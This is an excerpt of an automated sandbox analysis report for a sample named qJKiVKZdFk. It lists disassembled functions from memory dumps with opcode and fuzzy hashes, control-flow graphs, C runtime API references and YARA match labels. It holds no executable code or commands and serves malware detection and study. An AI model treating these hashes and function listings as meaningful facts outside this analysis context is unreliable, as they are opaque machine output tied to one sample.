                                                                                                                                        • Instruction Fuzzy Hash: 0831F3716183429FD741EF29C480A4BFBE4FFC8254F45D95EF98897221D731E9848B62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE18D0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                        • Instruction ID: 48f5334e736ea140d2b4d1abfbdb7b8c19b359a74130f375a1b1dfc445d71597
                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                        • Instruction Fuzzy Hash: 501138BB308142C3D608E6AEECB45B6E3D6FBC6220B2D437BD0B34B658D132E141D500
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCB000 Relevance: .1, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                        • Instruction ID: 35ffb7853976eb73851e3a5ad0a6d91bb1d18d858169c31ed1cbbaa2069cf9cf
                                                                                                                                        • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                        • Instruction Fuzzy Hash: AD11300A4492C4BDCF424A7840E56EBEFA58E27218F4A71DA84C44B743D01B150FE761
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 044150A3 Relevance: .1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213315113.0000000004415000.00000040.00000020.00020000.00000000.sdmp, Offset: 04415000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4415000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction ID: 48e7984d1cac54f534329e9ca33cdbc9eb1b53bc41c14277ed106e15f05c5653
                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction Fuzzy Hash: 6511A572740100AFDB54DF55DCC0FE677EAEB89324B29806AED08CB322E675E842C760
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC0042 Relevance: .1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction ID: fc9c6f410c90de48e2cf32572f61e37f10a97542b1b8773feaf8a9bd7a024cfb
                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction Fuzzy Hash: 46118272340101DFDB54DF65DC94FA677EAFB88220B1A819AED08CB351E675E841C760
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCA79A Relevance: .0, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                                        • Instruction ID: a395fd5387a50e3303596fe38e309bff89e29b4d45138a0cee7251313360ddea
                                                                                                                                        • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                                        • Instruction Fuzzy Hash: 130128768106669BD700DF3EC8C045AFBF1BF082117928B2ADC9083A41D334E662DBE4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE6437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 551 5de6437-5de6440 552 5de6466 551->552 553 5de6442-5de6446 551->553 555 5de6468-5de646b 552->555 553->552 554 5de6448-5de6459 call 5de9636 553->554 558 5de646c-5de647d call 5de9636 554->558 559 5de645b-5de6460 call 5de5ba8 554->559 564 5de647f-5de6480 call 5de158d 558->564 565 5de6488-5de649a call 5de9636 558->565 559->552 569 5de6485-5de6486 564->569 570 5de64ac-5de64cd call 5de5f4c call 5de6837 565->570 571 5de649c-5de64aa call 5de158d * 2 565->571 569->559 580 5de64cf-5de64dd call 5de557d 570->580 581 5de64e2-5de6500 call 5de158d call 5de4edc call 5de4d82 call 5de158d 570->581 571->569 587 5de64df 580->587 588 5de6502-5de6505 580->588 590 5de6507-5de6509 581->590 587->581 588->590 590->555
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1442030790-0
                                                                                                                                        • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                        • Instruction ID: 0c0efad90b571c87086bd74df74d580b4a3dcc3b2f8bff33218a0db348f4a48b
                                                                                                                                        • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                        • Instruction Fuzzy Hash: 3421C331308601AEEB227F65EC09E1F7BE5EF52760B90842BF586550A0EA32C551CB71
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE3F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 595 5de3f16-5de3f2f 596 5de3f49-5de3f5e call 5debdc0 595->596 597 5de3f31-5de3f3b call 5de5ba8 call 5de4c72 595->597 596->597 603 5de3f60-5de3f63 596->603 604 5de3f40 597->604 605 5de3f77-5de3f7d 603->605 606 5de3f65 603->606 607 5de3f42-5de3f48 604->607 610 5de3f7f 605->610 611 5de3f89-5de3f9a call 5df0504 call 5df01a3 605->611 608 5de3f6b-5de3f75 call 5de5ba8 606->608 609 5de3f67-5de3f69 606->609 608->604 609->605 609->608 610->608 612 5de3f81-5de3f87 610->612 619 5de4185-5de418f call 5de4c9d 611->619 620 5de3fa0-5de3fac call 5df01cd 611->620 612->608 612->611 620->619 625 5de3fb2-5de3fbe call 5df01f7 620->625 625->619 628 5de3fc4-5de3fcb 625->628 629 5de3fcd 628->629 630 5de403b-5de4046 call 5df02d9 628->630 632 5de3fcf-5de3fd5 629->632 633 5de3fd7-5de3ff3 call 5df02d9 629->633 630->607 637 5de404c-5de404f 630->637 632->630 632->633 633->607 638 5de3ff9-5de3ffc 633->638 639 5de407e-5de408b 637->639 640 5de4051-5de405a call 5df0554 637->640 641 5de413e-5de4140 638->641 642 5de4002-5de400b call 5df0554 638->642 643 5de408d-5de409c call 5df0f40 639->643 640->639 648 5de405c-5de407c 640->648 641->607 642->641 651 5de4011-5de4029 call 5df02d9 642->651 652 5de409e-5de40a6 643->652 653 5de40a9-5de40d0 call 5df0e90 call 5df0f40 643->653 648->643 651->607 658 5de402f-5de4036 651->658 652->653 661 5de40de-5de4105 call 5df0e90 call 5df0f40 653->661 662 5de40d2-5de40db 653->662 658->641 667 5de4107-5de4110 661->667 668 5de4113-5de4122 call 5df0e90 661->668 662->661 667->668 671 5de414f-5de4168 668->671 672 5de4124 668->672 675 5de416a-5de4183 671->675 676 5de413b 671->676 673 5de412a-5de4138 672->673 674 5de4126-5de4128 672->674 673->676 674->673 677 5de4145-5de4147 674->677 675->641 676->641 677->641 678 5de4149 677->678 678->671 679 5de414b-5de414d 678->679 679->641 679->671
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 05DE3F51
                                                                                                                                          • Part of subcall function 05DE5BA8: __getptd_noexit.LIBCMT ref: 05DE5BA8
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05DE3FEA
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05DE4020
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05DE403D
                                                                                                                                        • __allrem.LIBCMT ref: 05DE4093
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DE40AF
                                                                                                                                        • __allrem.LIBCMT ref: 05DE40C6
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DE40E4
                                                                                                                                        • __allrem.LIBCMT ref: 05DE40FB
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DE4119
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05DE418A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                        • Instruction ID: b04fcf5af32421701f9772e4de7f60623d850666e609dade687bf5250028258a
                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                        • Instruction Fuzzy Hash: 2A71E271B01B16ABEB15BE68CC44B6AB3B9FF10364F15423BE915D7281E770E9408BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3432600739-0
                                                                                                                                        • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                        • Instruction ID: 153f9d5489c8ba9256bfda01af508184b768168be6b6dad01873bde442b432b6
                                                                                                                                        • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                        • Instruction Fuzzy Hash: 6D411F32A04304AFDB00BFA4EC88B9E3BA5FF15714F10846FE91896291DB76D645DB71
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE84AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 744 5de84ab-5de84d9 call 5de8477 749 5de84db-5de84de 744->749 750 5de84f3-5de850b call 5de158d 744->750 752 5de84ed 749->752 753 5de84e0-5de84eb call 5de158d 749->753 757 5de850d-5de850f 750->757 758 5de8524-5de855a call 5de158d * 3 750->758 752->750 753->749 753->752 759 5de851e 757->759 760 5de8511-5de851c call 5de158d 757->760 769 5de855c-5de8562 758->769 770 5de856b-5de857e 758->770 759->758 760->757 760->759 769->770 771 5de8564-5de856a call 5de158d 769->771 775 5de858d-5de8594 770->775 776 5de8580-5de8587 call 5de158d 770->776 771->770 778 5de8596-5de859d call 5de158d 775->778 779 5de85a3-5de85ae 775->779 776->775 778->779 780 5de85cb-5de85cd 779->780 781 5de85b0-5de85bc 779->781 781->780 784 5de85be-5de85c5 call 5de158d 781->784 784->780
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ExitProcess___crt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1022109855-0
                                                                                                                                        • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                        • Instruction ID: 00e8e5b38ff77a06f627c9d4c59a8d5209c7ee5ab9dc9b65ce5e5b7f82a0316b
                                                                                                                                        • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                        • Instruction Fuzzy Hash: 6F31A031A00750DBCB21BF54FC8885977B4FB15320794863BE906572B0CBB499CAFEA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E0FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E0FC1F
                                                                                                                                          • Part of subcall function 05DF169C: std::exception::_Copy_str.LIBCMT ref: 05DF16B5
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FC34
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E0FC4D
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FC62
                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 05E0FC74
                                                                                                                                          • Part of subcall function 05E0F914: std::exception::exception.LIBCMT ref: 05E0F92E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FC82
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E0FC9B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FCB0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                                                        • String ID: leM
                                                                                                                                        • API String ID: 3569886845-2926266777
                                                                                                                                        • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                        • Instruction ID: 340d76d56e0430fe95a1a44f32e839178e4b54e85893684ae4721c33a5f0d0c9
                                                                                                                                        • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                        • Instruction Fuzzy Hash: F411DA79D0020DBBCF00FFE5D459CDDBB7CEA04244F818567A91497240EB74A748CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3721157643-0
                                                                                                                                        • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                        • Instruction ID: 0bb683ccc60e1be5de21109ce927cb07d5e860d8d568bc5b57186cd41dd0a0c1
                                                                                                                                        • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                        • Instruction Fuzzy Hash: EC11D5B67006556AC26177F55C15EFF7AECDF46701F0400ABFA88E1180DA585A0593B2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DD1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 65388428-0
                                                                                                                                        • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                        • Instruction ID: f7fb4e3ca1486c22d4373675a610c9b80a44afb54a09d13ff31d1267aff3472e
                                                                                                                                        • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                        • Instruction Fuzzy Hash: EC513C71E40219BADB11DBE5DD49FAEBBB8FB04744F100026FA05B6180E7746A05CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                        • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                        • Instruction ID: bd37adbf241d5a0281696e3364cf9db21ec83bd1bf0f117ca88111d18ff35f98
                                                                                                                                        • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                        • Instruction Fuzzy Hash: 91513FB1E4020ABADF11DFE1DD46FEEBB79FB04704F10412AF905B7180D675AA058BA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                        • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                        • Instruction ID: 5768ba0d96def0508a711bb40caf37d51d124dcbb7f74c1888f15965d690828b
                                                                                                                                        • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                        • Instruction Fuzzy Hash: ED513171E4020AAADF11DFA5DD85FFEBBB9FB04704F10012AFA05B7180D674A9058BA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E0208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3534693527-0
                                                                                                                                        • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                        • Instruction ID: 384f979e5abee442af12261999d4ed082b1c716dd5a4594818a64cacc187df17
                                                                                                                                        • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                        • Instruction Fuzzy Hash: 2A31F436B04321AAEB217F64DC0CBAF77D5EF05B68F106016EB55EB2C0DB74898082B1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E866D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd_noexit.LIBCMT ref: 05E866DD
                                                                                                                                          • Part of subcall function 05DE59BF: __calloc_crt.LIBCMT ref: 05DE59E2
                                                                                                                                          • Part of subcall function 05DE59BF: __initptd.LIBCMT ref: 05DE5A04
                                                                                                                                        • __calloc_crt.LIBCMT ref: 05E86700
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 05E8671E
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05E8673B
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 05E8676D
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05E8678B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4066021419-0
                                                                                                                                        • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                        • Instruction ID: a8878543a0c0b2c7ed6de8b826dc7d74c6b7dc674546be1d5ad9c84fbbb8ab5c
                                                                                                                                        • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                        • Instruction Fuzzy Hash: DA11C132701A146BFB227B659C08FBA739DEF106A8F401427FE8CEB240E722DD0042E4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DD2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: D
                                                                                                                                        • API String ID: 2102423945-2746444292
                                                                                                                                        • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                        • Instruction ID: 9b7977aee8fd066aed81f1bb920a2e593fb716867289f5db97fd9552d95e860d
                                                                                                                                        • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                        • Instruction Fuzzy Hash: 60E15D75D40219EBDF24DBA0CD89FEEB7B8BF04304F14416AE50AE6190EB74AA45CF64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCD8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: $$$(
                                                                                                                                        • API String ID: 2102423945-3551151888
                                                                                                                                        • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                        • Instruction ID: 97fa9954107f714000df1298ecfb336c8b285c51fcfb25222eec168a026c2d3f
                                                                                                                                        • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                        • Instruction Fuzzy Hash: 0E91A071D00259EAEF20DFA4CC49BEEBBB6EF05304F1441AAD40577280DBB65A48CB65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

